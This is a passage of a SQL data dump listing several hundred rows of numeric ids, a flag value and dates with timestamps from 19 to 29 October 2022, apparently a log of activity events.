07:56:24'),(62466,3313,1,'2022-10-19','2022-10-19 08:11:27'),(62467,1711,1,'2022-10-19','2022-10-19 08:24:38'),(62468,1711,1,'2022-10-19','2022-10-19 08:24:54'),(62469,1711,1,'2022-10-19','2022-10-19 08:26:35'),(62470,1711,1,'2022-10-19','2022-10-19 08:26:49'),(62471,4341,1,'2022-10-19','2022-10-19 08:41:27'),(62472,4878,1,'2022-10-19','2022-10-19 08:44:09'),(62473,3781,1,'2022-10-19','2022-10-19 08:53:25'),(62474,1586,1,'2022-10-19','2022-10-19 09:24:12'),(62475,1610,1,'2022-10-19','2022-10-19 09:44:04'),(62476,2395,1,'2022-10-19','2022-10-19 09:56:25'),(62477,84,1,'2022-10-19','2022-10-19 10:49:58'),(62478,2503,1,'2022-10-19','2022-10-19 10:52:16'),(62479,84,1,'2022-10-19','2022-10-19 10:55:42'),(62480,84,1,'2022-10-19','2022-10-19 10:56:12'),(62481,3694,1,'2022-10-19','2022-10-19 10:56:23'),(62482,3691,1,'2022-10-19','2022-10-19 10:56:41'),(62483,80,1,'2022-10-19','2022-10-19 11:05:39'),(62484,80,1,'2022-10-19','2022-10-19 11:08:24'),(62485,80,1,'2022-10-19','2022-10-19 11:09:58'),(62486,80,1,'2022-10-19','2022-10-19 11:10:04'),(62487,80,1,'2022-10-19','2022-10-19 11:11:25'),(62488,80,1,'2022-10-19','2022-10-19 11:13:30'),(62489,2704,1,'2022-10-19','2022-10-19 11:27:31'),(62490,1602,1,'2022-10-19','2022-10-19 11:51:16'),(62491,3034,1,'2022-10-19','2022-10-19 11:52:24'),(62492,76,1,'2022-10-19','2022-10-19 11:54:18'),(62493,1610,1,'2022-10-19','2022-10-19 11:55:16'),(62494,1606,1,'2022-10-19','2022-10-19 11:56:28'),(62495,3034,1,'2022-10-19','2022-10-19 12:16:08'),(62496,76,1,'2022-10-19','2022-10-19 12:18:23'),(62497,4412,1,'2022-10-19','2022-10-19 12:58:49'),(62498,470,1,'2022-10-19','2022-10-19 13:26:26'),(62499,84,1,'2022-10-19','2022-10-19 13:38:37'),(62500,2775,1,'2022-10-19','2022-10-19 13:56:26'),(62501,72,1,'2022-10-19','2022-10-19 14:25:13'),(62502,3742,1,'2022-10-19','2022-10-19 14:26:27'),(62503,2309,1,'2022-10-19','2022-10-19 14:26:37'),(62504,4976,1,'2022-10-19','2022-10-19 14:54:05'),(62505,4976,1,'2022-10-19','2022-10-19 14:55:46'),(62506,4612,1,'2022-10-19','2022-10-19 14:56:27'),(62507,4412,1,'2022-10-19','2022-10-19 15:55:52'),(62508,3705,1,'2022-10-19','2022-10-19 16:26:26'),(62509,1586,1,'2022-10-19','2022-10-19 16:35:28'),(62510,4976,1,'2022-10-19','2022-10-19 17:56:37'),(62511,4911,1,'2022-10-19','2022-10-19 19:14:06'),(62512,2457,1,'2022-10-19','2022-10-19 20:59:35'),(62513,4587,1,'2022-10-19','2022-10-19 21:15:09'),(62514,1582,1,'2022-10-19','2022-10-19 22:18:14'),(62515,72,1,'2022-10-19','2022-10-19 23:13:07'),(62516,5163,1,'2022-10-19','2022-10-19 23:30:15'),(62517,2148,1,'2022-10-20','2022-10-20 00:09:02'),(62518,2148,1,'2022-10-20','2022-10-20 00:09:12'),(62519,1594,1,'2022-10-20','2022-10-20 03:08:27'),(62520,1594,1,'2022-10-20','2022-10-20 03:23:30'),(62521,4524,1,'2022-10-20','2022-10-20 03:41:38'),(62522,1610,1,'2022-10-20','2022-10-20 05:27:20'),(62523,4457,1,'2022-10-20','2022-10-20 05:29:26'),(62524,4747,1,'2022-10-20','2022-10-20 07:08:10'),(62525,72,1,'2022-10-20','2022-10-20 07:53:15'),(62526,3781,1,'2022-10-20','2022-10-20 09:19:12'),(62527,5163,1,'2022-10-20','2022-10-20 09:25:55'),(62528,4963,1,'2022-10-20','2022-10-20 09:46:09'),(62529,3102,1,'2022-10-20','2022-10-20 10:31:05'),(62530,89,1,'2022-10-20','2022-10-20 10:39:00'),(62531,1588,1,'2022-10-20','2022-10-20 10:39:13'),(62532,91,1,'2022-10-20','2022-10-20 10:39:38'),(62533,1724,1,'2022-10-20','2022-10-20 10:40:42'),(62534,1724,1,'2022-10-20','2022-10-20 10:40:51'),(62535,1724,1,'2022-10-20','2022-10-20 10:41:01'),(62536,87,1,'2022-10-20','2022-10-20 10:41:42'),(62537,1610,1,'2022-10-20','2022-10-20 10:53:02'),(62538,1602,1,'2022-10-20','2022-10-20 10:57:57'),(62539,80,1,'2022-10-20','2022-10-20 11:44:07'),(62540,3781,1,'2022-10-20','2022-10-20 11:45:35'),(62541,3781,1,'2022-10-20','2022-10-20 11:45:36'),(62542,5163,1,'2022-10-20','2022-10-20 12:11:51'),(62543,1596,1,'2022-10-20','2022-10-20 12:22:44'),(62544,1588,1,'2022-10-20','2022-10-20 12:41:08'),(62545,1588,1,'2022-10-20','2022-10-20 12:44:11'),(62546,3781,1,'2022-10-20','2022-10-20 12:47:19'),(62547,1588,1,'2022-10-20','2022-10-20 12:49:28'),(62548,1588,1,'2022-10-20','2022-10-20 12:53:05'),(62549,5163,1,'2022-10-20','2022-10-20 12:53:11'),(62550,5163,1,'2022-10-20','2022-10-20 12:53:21'),(62551,5163,1,'2022-10-20','2022-10-20 12:54:14'),(62552,5163,1,'2022-10-20','2022-10-20 12:56:32'),(62553,4412,1,'2022-10-20','2022-10-20 14:17:06'),(62554,2704,1,'2022-10-20','2022-10-20 14:19:05'),(62555,4416,1,'2022-10-20','2022-10-20 14:31:16'),(62556,4911,1,'2022-10-20','2022-10-20 14:33:19'),(62557,4963,1,'2022-10-20','2022-10-20 14:42:08'),(62558,76,1,'2022-10-20','2022-10-20 14:42:48'),(62559,4963,1,'2022-10-20','2022-10-20 14:43:07'),(62560,4963,1,'2022-10-20','2022-10-20 14:43:16'),(62561,4911,1,'2022-10-20','2022-10-20 15:43:59'),(62562,91,1,'2022-10-20','2022-10-20 16:05:02'),(62563,570,1,'2022-10-20','2022-10-20 16:07:02'),(62564,91,1,'2022-10-20','2022-10-20 16:08:25'),(62565,5157,1,'2022-10-20','2022-10-20 16:08:38'),(62566,1776,1,'2022-10-20','2022-10-20 16:14:02'),(62567,91,1,'2022-10-20','2022-10-20 16:15:58'),(62568,1776,1,'2022-10-20','2022-10-20 16:19:11'),(62569,1776,1,'2022-10-20','2022-10-20 16:19:18'),(62570,1776,1,'2022-10-20','2022-10-20 16:19:29'),(62571,1776,1,'2022-10-20','2022-10-20 16:19:39'),(62572,1776,1,'2022-10-20','2022-10-20 16:19:54'),(62573,1776,1,'2022-10-20','2022-10-20 16:20:07'),(62574,473,1,'2022-10-20','2022-10-20 16:21:50'),(62575,1870,1,'2022-10-20','2022-10-20 16:23:03'),(62576,72,1,'2022-10-20','2022-10-20 16:23:08'),(62577,1870,1,'2022-10-20','2022-10-20 16:23:25'),(62578,5024,1,'2022-10-20','2022-10-20 16:27:39'),(62579,1612,1,'2022-10-20','2022-10-20 19:15:12'),(62580,3764,1,'2022-10-20','2022-10-20 19:45:03'),(62581,4335,1,'2022-10-20','2022-10-20 20:18:23'),(62582,5163,1,'2022-10-20','2022-10-20 20:58:38'),(62583,3271,1,'2022-10-20','2022-10-20 21:48:52'),(62584,4275,1,'2022-10-20','2022-10-20 21:54:11'),(62585,1766,1,'2022-10-20','2022-10-20 22:31:58'),(62586,1766,1,'2022-10-20','2022-10-20 22:32:09'),(62587,1766,1,'2022-10-20','2022-10-20 22:32:27'),(62588,1588,1,'2022-10-20','2022-10-20 23:24:44'),(62589,72,1,'2022-10-21','2022-10-21 01:20:57'),(62590,3691,1,'2022-10-21','2022-10-21 02:12:38'),(62591,76,1,'2022-10-21','2022-10-21 02:15:27'),(62592,87,1,'2022-10-21','2022-10-21 02:15:40'),(62593,1718,1,'2022-10-21','2022-10-21 03:48:43'),(62594,2411,1,'2022-10-21','2022-10-21 04:08:56'),(62595,1711,1,'2022-10-21','2022-10-21 06:01:09'),(62596,1711,1,'2022-10-21','2022-10-21 06:03:51'),(62597,80,1,'2022-10-21','2022-10-21 06:08:36'),(62598,2904,1,'2022-10-21','2022-10-21 06:10:46'),(62599,4911,1,'2022-10-21','2022-10-21 07:58:38'),(62600,72,1,'2022-10-21','2022-10-21 09:20:45'),(62601,2769,1,'2022-10-21','2022-10-21 09:24:02'),(62602,87,1,'2022-10-21','2022-10-21 10:01:31'),(62603,91,1,'2022-10-21','2022-10-21 10:10:04'),(62604,4412,1,'2022-10-21','2022-10-21 10:12:11'),(62605,91,1,'2022-10-21','2022-10-21 10:17:23'),(62606,5071,1,'2022-10-21','2022-10-21 10:25:57'),(62607,91,1,'2022-10-21','2022-10-21 10:27:31'),(62608,1594,1,'2022-10-21','2022-10-21 11:02:24'),(62609,1584,1,'2022-10-21','2022-10-21 12:16:45'),(62610,2904,1,'2022-10-21','2022-10-21 13:11:55'),(62611,4988,1,'2022-10-21','2022-10-21 13:42:39'),(62612,4983,1,'2022-10-21','2022-10-21 13:44:57'),(62613,91,1,'2022-10-21','2022-10-21 14:18:10'),(62614,1586,1,'2022-10-21','2022-10-21 14:40:30'),(62615,3781,1,'2022-10-21','2022-10-21 15:05:29'),(62616,3781,1,'2022-10-21','2022-10-21 15:05:30'),(62617,1701,1,'2022-10-21','2022-10-21 15:58:01'),(62618,3691,1,'2022-10-21','2022-10-21 16:13:00'),(62619,4587,1,'2022-10-21','2022-10-21 16:33:30'),(62620,4587,1,'2022-10-21','2022-10-21 16:33:32'),(62621,1594,1,'2022-10-21','2022-10-21 17:07:54'),(62622,2411,1,'2022-10-21','2022-10-21 17:09:11'),(62623,72,1,'2022-10-21','2022-10-21 17:19:35'),(62624,5163,1,'2022-10-21','2022-10-21 20:14:32'),(62625,3781,1,'2022-10-21','2022-10-21 21:07:57'),(62626,1724,1,'2022-10-22','2022-10-22 00:41:55'),(62627,1724,1,'2022-10-22','2022-10-22 00:42:04'),(62628,1724,1,'2022-10-22','2022-10-22 00:42:30'),(62629,1724,1,'2022-10-22','2022-10-22 00:45:23'),(62630,72,1,'2022-10-22','2022-10-22 01:25:43'),(62631,4944,1,'2022-10-22','2022-10-22 01:52:37'),(62632,4382,1,'2022-10-22','2022-10-22 05:00:23'),(62633,3498,1,'2022-10-22','2022-10-22 05:11:50'),(62634,3742,1,'2022-10-22','2022-10-22 05:11:50'),(62635,3482,1,'2022-10-22','2022-10-22 05:11:52'),(62636,3430,1,'2022-10-22','2022-10-22 05:11:57'),(62637,3438,1,'2022-10-22','2022-10-22 05:11:58'),(62638,3030,1,'2022-10-22','2022-10-22 05:49:12'),(62639,2991,1,'2022-10-22','2022-10-22 06:02:26'),(62640,72,1,'2022-10-22','2022-10-22 09:29:06'),(62641,3764,1,'2022-10-22','2022-10-22 09:53:46'),(62642,80,1,'2022-10-22','2022-10-22 10:30:58'),(62643,1877,1,'2022-10-22','2022-10-22 11:04:52'),(62644,68,1,'2022-10-22','2022-10-22 11:26:13'),(62645,570,1,'2022-10-22','2022-10-22 11:30:11'),(62646,91,1,'2022-10-22','2022-10-22 11:34:24'),(62647,1594,1,'2022-10-22','2022-10-22 11:38:31'),(62648,4363,1,'2022-10-22','2022-10-22 14:43:36'),(62649,4950,1,'2022-10-22','2022-10-22 14:52:47'),(62650,4587,1,'2022-10-22','2022-10-22 16:00:52'),(62651,3541,1,'2022-10-22','2022-10-22 16:07:13'),(62652,4416,1,'2022-10-22','2022-10-22 16:26:19'),(62653,3489,1,'2022-10-22','2022-10-22 16:34:58'),(62654,72,1,'2022-10-22','2022-10-22 17:32:01'),(62655,3107,1,'2022-10-22','2022-10-22 17:50:53'),(62656,2658,1,'2022-10-22','2022-10-22 17:54:03'),(62657,2658,1,'2022-10-22','2022-10-22 17:58:25'),(62658,2658,1,'2022-10-22','2022-10-22 17:58:39'),(62659,3746,1,'2022-10-22','2022-10-22 18:02:20'),(62660,1870,1,'2022-10-22','2022-10-22 20:01:09'),(62661,4960,1,'2022-10-22','2022-10-22 20:45:41'),(62662,5128,1,'2022-10-22','2022-10-22 20:53:43'),(62663,570,1,'2022-10-22','2022-10-22 23:12:13'),(62664,76,1,'2022-10-23','2022-10-23 01:06:39'),(62665,76,1,'2022-10-23','2022-10-23 01:08:36'),(62666,72,1,'2022-10-23','2022-10-23 01:37:04'),(62667,80,1,'2022-10-23','2022-10-23 03:22:26'),(62668,2411,1,'2022-10-23','2022-10-23 08:38:14'),(62669,5028,1,'2022-10-23','2022-10-23 09:23:15'),(62670,72,1,'2022-10-23','2022-10-23 09:36:59'),(62671,1602,1,'2022-10-23','2022-10-23 10:05:45'),(62672,89,1,'2022-10-23','2022-10-23 11:27:31'),(62673,4416,1,'2022-10-23','2022-10-23 12:18:44'),(62674,1751,1,'2022-10-23','2022-10-23 13:02:11'),(62675,4520,1,'2022-10-23','2022-10-23 13:03:43'),(62676,1610,1,'2022-10-23','2022-10-23 15:05:29'),(62677,2658,1,'2022-10-23','2022-10-23 15:06:44'),(62678,4738,1,'2022-10-23','2022-10-23 15:19:25'),(62679,68,1,'2022-10-23','2022-10-23 15:21:24'),(62680,4738,1,'2022-10-23','2022-10-23 15:21:53'),(62681,3102,1,'2022-10-23','2022-10-23 15:47:52'),(62682,1602,1,'2022-10-23','2022-10-23 17:57:52'),(62683,1602,1,'2022-10-23','2022-10-23 17:57:52'),(62684,2297,1,'2022-10-23','2022-10-23 18:02:46'),(62685,72,1,'2022-10-23','2022-10-23 18:06:46'),(62686,5163,1,'2022-10-23','2022-10-23 21:03:28'),(62687,335,1,'2022-10-23','2022-10-23 21:05:51'),(62688,1602,1,'2022-10-23','2022-10-23 21:54:41'),(62689,76,1,'2022-10-23','2022-10-23 22:01:34'),(62690,91,1,'2022-10-23','2022-10-23 22:02:33'),(62691,80,1,'2022-10-23','2022-10-23 22:07:01'),(62692,4457,1,'2022-10-23','2022-10-23 22:08:13'),(62693,68,1,'2022-10-23','2022-10-23 22:08:31'),(62694,87,1,'2022-10-23','2022-10-23 22:10:05'),(62695,87,1,'2022-10-23','2022-10-23 22:12:13'),(62696,68,1,'2022-10-23','2022-10-23 22:12:15'),(62697,4457,1,'2022-10-23','2022-10-23 22:12:19'),(62698,5071,1,'2022-10-24','2022-10-24 01:05:09'),(62699,3127,1,'2022-10-24','2022-10-24 01:32:29'),(62700,72,1,'2022-10-24','2022-10-24 02:09:00'),(62701,2964,1,'2022-10-24','2022-10-24 02:14:07'),(62702,68,1,'2022-10-24','2022-10-24 02:14:19'),(62703,2964,1,'2022-10-24','2022-10-24 02:14:49'),(62704,4950,1,'2022-10-24','2022-10-24 03:05:40'),(62705,87,1,'2022-10-24','2022-10-24 03:15:02'),(62706,4762,1,'2022-10-24','2022-10-24 06:42:02'),(62707,4762,1,'2022-10-24','2022-10-24 06:44:37'),(62708,5137,1,'2022-10-24','2022-10-24 06:45:30'),(62709,76,1,'2022-10-24','2022-10-24 09:50:03'),(62710,76,1,'2022-10-24','2022-10-24 09:51:55'),(62711,72,1,'2022-10-24','2022-10-24 10:09:10'),(62712,1602,1,'2022-10-24','2022-10-24 11:21:24'),(62713,1602,1,'2022-10-24','2022-10-24 11:46:46'),(62714,68,1,'2022-10-24','2022-10-24 11:46:54'),(62715,4966,1,'2022-10-24','2022-10-24 11:50:33'),(62716,4966,1,'2022-10-24','2022-10-24 11:51:43'),(62717,4608,1,'2022-10-24','2022-10-24 12:00:20'),(62718,4747,1,'2022-10-24','2022-10-24 12:35:55'),(62719,4944,1,'2022-10-24','2022-10-24 12:44:59'),(62720,4944,1,'2022-10-24','2022-10-24 12:45:01'),(62721,4944,1,'2022-10-24','2022-10-24 12:46:42'),(62722,1544,1,'2022-10-24','2022-10-24 12:49:33'),(62723,1594,1,'2022-10-24','2022-10-24 13:15:08'),(62724,3781,1,'2022-10-24','2022-10-24 13:40:06'),(62725,3781,1,'2022-10-24','2022-10-24 14:20:32'),(62726,1594,1,'2022-10-24','2022-10-24 15:01:38'),(62727,1584,1,'2022-10-24','2022-10-24 15:47:00'),(62728,5163,1,'2022-10-24','2022-10-24 16:41:35'),(62729,72,1,'2022-10-24','2022-10-24 18:12:13'),(62730,1582,1,'2022-10-24','2022-10-24 18:21:00'),(62731,80,1,'2022-10-24','2022-10-24 18:26:42'),(62732,80,1,'2022-10-24','2022-10-24 18:30:30'),(62733,2395,1,'2022-10-24','2022-10-24 18:30:44'),(62734,80,1,'2022-10-24','2022-10-24 18:36:58'),(62735,1582,1,'2022-10-24','2022-10-24 18:37:02'),(62736,4966,1,'2022-10-24','2022-10-24 18:44:31'),(62737,1724,1,'2022-10-25','2022-10-25 00:30:38'),(62738,4412,1,'2022-10-25','2022-10-25 00:30:38'),(62739,1724,1,'2022-10-25','2022-10-25 00:32:00'),(62740,72,1,'2022-10-25','2022-10-25 02:12:15'),(62741,1592,1,'2022-10-25','2022-10-25 08:02:59'),(62742,3083,1,'2022-10-25','2022-10-25 09:40:56'),(62743,76,1,'2022-10-25','2022-10-25 09:41:17'),(62744,2503,1,'2022-10-25','2022-10-25 09:41:58'),(62745,5163,1,'2022-10-25','2022-10-25 09:56:42'),(62746,5137,1,'2022-10-25','2022-10-25 09:57:54'),(62747,1594,1,'2022-10-25','2022-10-25 10:09:08'),(62748,72,1,'2022-10-25','2022-10-25 11:08:22'),(62749,1728,1,'2022-10-25','2022-10-25 12:26:15'),(62750,1596,1,'2022-10-25','2022-10-25 12:40:09'),(62751,4911,1,'2022-10-25','2022-10-25 12:55:53'),(62752,80,1,'2022-10-25','2022-10-25 12:56:24'),(62753,4911,1,'2022-10-25','2022-10-25 12:56:31'),(62754,4966,1,'2022-10-25','2022-10-25 13:09:37'),(62755,2904,1,'2022-10-25','2022-10-25 13:10:26'),(62756,4966,1,'2022-10-25','2022-10-25 13:10:56'),(62757,5163,1,'2022-10-25','2022-10-25 13:13:48'),(62758,91,1,'2022-10-25','2022-10-25 13:14:27'),(62759,4436,1,'2022-10-25','2022-10-25 13:14:52'),(62760,91,1,'2022-10-25','2022-10-25 13:15:03'),(62761,5163,1,'2022-10-25','2022-10-25 13:15:03'),(62762,1610,1,'2022-10-25','2022-10-25 13:18:12'),(62763,1610,1,'2022-10-25','2022-10-25 13:18:12'),(62764,1610,1,'2022-10-25','2022-10-25 13:19:22'),(62765,4608,1,'2022-10-25','2022-10-25 16:15:23'),(62766,1594,1,'2022-10-25','2022-10-25 16:18:06'),(62767,4608,1,'2022-10-25','2022-10-25 16:21:40'),(62768,74,1,'2022-10-25','2022-10-25 16:24:17'),(62769,1610,1,'2022-10-25','2022-10-25 16:36:17'),(62770,4448,1,'2022-10-25','2022-10-25 16:38:23'),(62771,4608,1,'2022-10-25','2022-10-25 17:04:10'),(62772,4448,1,'2022-10-25','2022-10-25 17:15:18'),(62773,72,1,'2022-10-25','2022-10-25 19:06:44'),(62774,5046,1,'2022-10-25','2022-10-25 20:43:16'),(62775,1610,1,'2022-10-25','2022-10-25 20:51:12'),(62776,2411,1,'2022-10-25','2022-10-25 20:57:06'),(62777,1598,1,'2022-10-25','2022-10-25 21:36:21'),(62778,1598,1,'2022-10-25','2022-10-25 21:36:33'),(62779,2159,1,'2022-10-25','2022-10-25 21:48:15'),(62780,4827,1,'2022-10-25','2022-10-25 22:38:28'),(62781,1544,1,'2022-10-25','2022-10-25 23:09:15'),(62782,80,1,'2022-10-26','2022-10-26 00:09:04'),(62783,4911,1,'2022-10-26','2022-10-26 01:20:08'),(62784,72,1,'2022-10-26','2022-10-26 03:07:54'),(62785,1594,1,'2022-10-26','2022-10-26 05:47:12'),(62786,4391,1,'2022-10-26','2022-10-26 06:45:56'),(62787,4870,1,'2022-10-26','2022-10-26 06:48:37'),(62788,1602,1,'2022-10-26','2022-10-26 08:47:43'),(62789,1602,1,'2022-10-26','2022-10-26 08:54:17'),(62790,2297,1,'2022-10-26','2022-10-26 10:23:12'),(62791,2297,1,'2022-10-26','2022-10-26 10:54:32'),(62792,72,1,'2022-10-26','2022-10-26 11:06:56'),(62793,108,1,'2022-10-26','2022-10-26 11:26:06'),(62794,3764,1,'2022-10-26','2022-10-26 12:16:53'),(62795,2457,1,'2022-10-26','2022-10-26 12:41:30'),(62796,2457,1,'2022-10-26','2022-10-26 13:17:09'),(62797,5062,1,'2022-10-26','2022-10-26 13:30:25'),(62798,80,1,'2022-10-26','2022-10-26 13:37:50'),(62799,1766,1,'2022-10-26','2022-10-26 14:01:44'),(62800,1594,1,'2022-10-26','2022-10-26 14:13:02'),(62801,1766,1,'2022-10-26','2022-10-26 14:24:31'),(62802,1586,1,'2022-10-26','2022-10-26 14:55:17'),(62803,4930,1,'2022-10-26','2022-10-26 15:15:06'),(62804,5163,1,'2022-10-26','2022-10-26 15:28:32'),(62805,68,1,'2022-10-26','2022-10-26 15:28:49'),(62806,5163,1,'2022-10-26','2022-10-26 15:29:44'),(62807,1582,1,'2022-10-26','2022-10-26 15:59:23'),(62808,3781,1,'2022-10-26','2022-10-26 16:05:56'),(62809,1596,1,'2022-10-26','2022-10-26 16:39:07'),(62810,80,1,'2022-10-26','2022-10-26 17:07:41'),(62811,2148,1,'2022-10-26','2022-10-26 17:09:34'),(62812,2148,1,'2022-10-26','2022-10-26 17:10:05'),(62813,2148,1,'2022-10-26','2022-10-26 17:10:25'),(62814,72,1,'2022-10-26','2022-10-26 19:05:13'),(62815,72,1,'2022-10-26','2022-10-26 19:48:37'),(62816,5109,1,'2022-10-26','2022-10-26 19:49:15'),(62817,3109,1,'2022-10-26','2022-10-26 21:07:23'),(62818,5140,1,'2022-10-26','2022-10-26 21:08:20'),(62819,1588,1,'2022-10-26','2022-10-26 21:28:10'),(62820,1588,1,'2022-10-26','2022-10-26 21:29:58'),(62821,468,1,'2022-10-26','2022-10-26 22:23:08'),(62822,4391,1,'2022-10-27','2022-10-27 00:07:04'),(62823,68,1,'2022-10-27','2022-10-27 02:02:23'),(62824,4457,1,'2022-10-27','2022-10-27 02:22:09'),(62825,72,1,'2022-10-27','2022-10-27 03:05:01'),(62826,1614,1,'2022-10-27','2022-10-27 03:36:05'),(62827,4963,1,'2022-10-27','2022-10-27 07:06:49'),(62828,4963,1,'2022-10-27','2022-10-27 07:08:26'),(62829,5071,1,'2022-10-27','2022-10-27 07:10:52'),(62830,4416,1,'2022-10-27','2022-10-27 08:35:52'),(62831,4416,1,'2022-10-27','2022-10-27 08:35:53'),(62832,3764,1,'2022-10-27','2022-10-27 09:00:46'),(62833,5163,1,'2022-10-27','2022-10-27 09:27:55'),(62834,4668,1,'2022-10-27','2022-10-27 10:44:44'),(62835,72,1,'2022-10-27','2022-10-27 11:04:53'),(62836,1728,1,'2022-10-27','2022-10-27 12:21:11'),(62837,1728,1,'2022-10-27','2022-10-27 12:21:32'),(62838,1728,1,'2022-10-27','2022-10-27 12:23:55'),(62839,4457,1,'2022-10-27','2022-10-27 12:27:12'),(62840,4436,1,'2022-10-27','2022-10-27 13:25:28'),(62841,1588,1,'2022-10-27','2022-10-27 13:41:21'),(62842,1586,1,'2022-10-27','2022-10-27 14:17:30'),(62843,1594,1,'2022-10-27','2022-10-27 15:00:23'),(62844,4950,1,'2022-10-27','2022-10-27 15:38:53'),(62845,4950,1,'2022-10-27','2022-10-27 15:40:57'),(62846,3030,1,'2022-10-27','2022-10-27 16:52:26'),(62847,3030,1,'2022-10-27','2022-10-27 16:55:00'),(62848,2775,1,'2022-10-27','2022-10-27 18:03:10'),(62849,2748,1,'2022-10-27','2022-10-27 18:03:48'),(62850,84,1,'2022-10-27','2022-10-27 18:04:41'),(62851,76,1,'2022-10-27','2022-10-27 18:05:19'),(62852,108,1,'2022-10-27','2022-10-27 18:05:46'),(62853,473,1,'2022-10-27','2022-10-27 18:09:58'),(62854,468,1,'2022-10-27','2022-10-27 18:11:06'),(62855,487,1,'2022-10-27','2022-10-27 18:12:13'),(62856,488,1,'2022-10-27','2022-10-27 18:12:34'),(62857,487,1,'2022-10-27','2022-10-27 18:13:06'),(62858,486,1,'2022-10-27','2022-10-27 18:13:10'),(62859,485,1,'2022-10-27','2022-10-27 18:13:35'),(62860,486,1,'2022-10-27','2022-10-27 18:14:11'),(62861,485,1,'2022-10-27','2022-10-27 18:14:33'),(62862,486,1,'2022-10-27','2022-10-27 18:14:34'),(62863,487,1,'2022-10-27','2022-10-27 18:14:36'),(62864,108,1,'2022-10-27','2022-10-27 18:15:15'),(62865,76,1,'2022-10-27','2022-10-27 18:17:22'),(62866,84,1,'2022-10-27','2022-10-27 18:17:34'),(62867,4930,1,'2022-10-27','2022-10-27 18:17:45'),(62868,84,1,'2022-10-27','2022-10-27 18:18:34'),(62869,76,1,'2022-10-27','2022-10-27 18:19:09'),(62870,84,1,'2022-10-27','2022-10-27 18:19:40'),(62871,4930,1,'2022-10-27','2022-10-27 18:19:41'),(62872,84,1,'2022-10-27','2022-10-27 18:19:42'),(62873,2748,1,'2022-10-27','2022-10-27 18:19:44'),(62874,2775,1,'2022-10-27','2022-10-27 18:19:45'),(62875,72,1,'2022-10-27','2022-10-27 19:05:45'),(62876,2159,1,'2022-10-27','2022-10-27 22:40:07'),(62877,2159,1,'2022-10-27','2022-10-27 22:40:07'),(62878,2309,1,'2022-10-27','2022-10-27 22:59:32'),(62879,2309,1,'2022-10-27','2022-10-27 22:59:33'),(62880,2309,1,'2022-10-27','2022-10-27 23:14:31'),(62881,2309,1,'2022-10-27','2022-10-27 23:17:36'),(62882,72,1,'2022-10-28','2022-10-28 03:04:55'),(62883,2503,1,'2022-10-28','2022-10-28 05:59:07'),(62884,91,1,'2022-10-28','2022-10-28 06:30:53'),(62885,3030,1,'2022-10-28','2022-10-28 08:07:43'),(62886,4457,1,'2022-10-28','2022-10-28 08:58:43'),(62887,1718,1,'2022-10-28','2022-10-28 09:41:40'),(62888,1586,1,'2022-10-28','2022-10-28 10:27:13'),(62889,72,1,'2022-10-28','2022-10-28 11:03:53'),(62890,2309,1,'2022-10-28','2022-10-28 11:04:37'),(62891,2309,1,'2022-10-28','2022-10-28 11:10:48'),(62892,2152,1,'2022-10-28','2022-10-28 11:52:19'),(62893,2152,1,'2022-10-28','2022-10-28 11:54:09'),(62894,2152,1,'2022-10-28','2022-10-28 11:54:30'),(62895,2152,1,'2022-10-28','2022-10-28 11:54:51'),(62896,2152,1,'2022-10-28','2022-10-28 11:55:31'),(62897,76,1,'2022-10-28','2022-10-28 11:55:52'),(62898,1600,1,'2022-10-28','2022-10-28 12:11:32'),(62899,1770,1,'2022-10-28','2022-10-28 12:31:30'),(62900,1596,1,'2022-10-28','2022-10-28 12:37:19'),(62901,4762,1,'2022-10-28','2022-10-28 12:51:54'),(62902,5080,1,'2022-10-28','2022-10-28 13:18:51'),(62903,1770,1,'2022-10-28','2022-10-28 13:20:57'),(62904,1770,1,'2022-10-28','2022-10-28 13:21:17'),(62905,1770,1,'2022-10-28','2022-10-28 13:21:32'),(62906,1770,1,'2022-10-28','2022-10-28 13:22:00'),(62907,1741,1,'2022-10-28','2022-10-28 14:49:52'),(62908,1728,1,'2022-10-28','2022-10-28 15:10:02'),(62909,4960,1,'2022-10-28','2022-10-28 16:14:26'),(62910,1766,1,'2022-10-28','2022-10-28 18:11:53'),(62911,72,1,'2022-10-28','2022-10-28 19:06:24'),(62912,89,1,'2022-10-28','2022-10-28 19:24:44'),(62913,4960,1,'2022-10-28','2022-10-28 19:55:45'),(62914,4963,1,'2022-10-28','2022-10-28 22:13:25'),(62915,4428,1,'2022-10-28','2022-10-28 22:52:04'),(62916,4963,1,'2022-10-28','2022-10-28 22:52:31'),(62917,4966,1,'2022-10-29','2022-10-29 03:01:07'),(62918,72,1,'2022-10-29','2022-10-29 03:07:16'),(62919,2457,1,'2022-10-29','2022-10-29 03:14:32'),(62920,1598,1,'2022-10-29','2022-10-29 03:46:24'),(62921,1600,1,'2022-10-29','2022-10-29 05:13:17'),(62922,1770,1,'2022-10-29','2022-10-29 06:30:29'),(62923,1770,1,'2022-10-29','2022-10-29 06:30:30'),(62924,1770,1,'2022-10-29','2022-10-29 06:30:31'),(62925,1770,1,'2022-10-29','2022-10-29 06:30:32'),(62926,68,1,'2022-10-29','2022-10-29 06:57:23'),(62927,1544,1,'2022-10-29','2022-10-29 10:09:48'),(62928,80,1,'2022-10-29','2022-10-29 10:20:23'),(62929,72,1,'2022-10-29','2022-10-29 11:07:03'),(62930,1722,1,'2022-10-29','2022-10-29 11:46:09'),(62931,84,1,'2022-10-29','2022-10-29 11:48:26'),(62932,91,1,'2022-10-29','2022-10-29 11:48:44'),(62933,5046,1,'2022-10-29','2022-10-29 11:49:38'),(62934,4874,1,'2022-10-29','2022-10-29 11:50:44'),(62935,91,1,'2022-10-29','2022-10-29 11:50:49'),(62936,5042,1,'2022-10-29','2022-10-29 11:51:32'),(62937,76,1,'2022-10-29','2022-10-29 11:58:31'),(62938,91,1,'2022-10-29','2022-10-29 11:59:21'),(62939,1722,1,'2022-10-29','2022-10-29 12:04:41'),(62940,1722,1,'2022-10-29','2022-10-29 12:06:23'),(62941,1722,1,'2022-10-29','2022-10-29 12:07:19'),(62942,1722,1,'2022-10-29','2022-10-29 12:07:37'),(62943,1722,1,'2022-10-29','2022-10-29 12:08:32'),(62944,1586,1,'2022-10-29','2022-10-29 13:48:12'),(62945,1586,1,'2022-10-29','2022-10-29 13:48:18'),(62946,87,1,'2022-10-29','2022-10-29 14:25:00'),(62947,1722,1,'2022-10-29','2022-10-29 14:26:10'),(62948,1722,1,'2022-10-29','2022-10-29 14:27:08'),(62949,1722,1,'2022-10-29','2022-10-29 14:28:49'),(62950,1722,1,'2022-10-29','2022-10-29 14:31:29'),(62951,1722,1,'2022-10-29','2022-10-29 14:46:58'),(62952,1722,1,'2022-10-29','2022-10-29 14:57:44'),(62953,76,1,'2022-10-29','2022-10-29 